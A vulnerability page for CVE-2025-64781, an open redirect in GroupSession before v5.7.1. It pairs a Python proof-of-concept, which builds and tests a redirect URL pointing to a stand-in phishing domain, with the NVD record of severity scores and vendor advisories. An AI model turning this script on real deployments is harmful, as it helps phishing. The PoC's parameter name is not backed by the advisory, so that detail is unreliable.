CVE-2025-64781

# CVE-2025-64781 PoC - GroupSession Open Redirect # Target: GroupSession Free/Cloud/ZION < v5.7.1 # Attack Type: Open Redirect (Phishing) import requests import urllib.parse TARGET_HOST = "http://localhost:8080" # Replace with actual target GSESSION_PATH = "/gsession/main.do" def generate_malicious_url(redirect_target): """Generate malicious URL with open redirect payload""" params = { "redirect": redirect_target } query_string = urllib.parse.urlencode(params) malicious_url = f"{TARGET_HOST}{GSESSION_PATH}?{query_string}" return malicious_url def test_open_redirect(): """Test for open redirect vulnerability""" # Malicious redirect target (attacker-controlled site) evil_domain = "http://malicious-phishing-site.com" # Generate exploit URL exploit_url = generate_malicious_url(evil_domain) print(f"[*] Target: {TARGET_HOST}") print(f"[*] Exploit URL: {exploit_url}") try: # Send request and check response response = requests.get(exploit_url, allow_redirects=False) # Check for redirect headers if 'Location' in response.headers or 'location' in response.headers: redirect_location = response.headers.get('Location') or response.headers.get('location') print(f"[!] Open Redirect Detected!") print(f"[*] Redirects to: {redirect_location}") # Verify if it redirects to external domain if evil_domain in redirect_location: print("[!] VULNERABLE: Redirects to attacker-controlled domain") return True else: print("[-] No redirect detected or protected") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-64781 - GroupSession Open Redirect PoC") print("=" * 60) test_open_redirect()

{"cve": {"id": "CVE-2025-64781", "sourceIdentifier": "[email protected]", "published": "2025-12-12T05:16:11.623", "lastModified": "2026-02-17T15:14:09.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1, \"External page display restriction\" is set to \"Do not limit\" in the initial configuration. With this configuration, the user may be redirected to an arbitrary website when accessing a specially crafted URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:bycloud:*:*:*", "versionEndExcluding": "5.7.1", "matchCriteriaId": "0023BDD1-63A1-4F4B-A949-7B5687512F86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:free:*:*:*", "versionEndExcluding": "5.7.1", "matchCriteriaId": "41253C33-6699-4FE8-80B5-917FF6F71E65"}, {"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:zion:*:*:*", "versionEndExcluding": "5.7.1", "matchCriteriaId": "428C47F8-9B26-4902-80C5-2E6A9D09B28E"}]}]}], "references": [{"url": "https://groupsession.jp/info/info-news/security20251208", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://jvn.jp/en/jp/JVN19940619/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}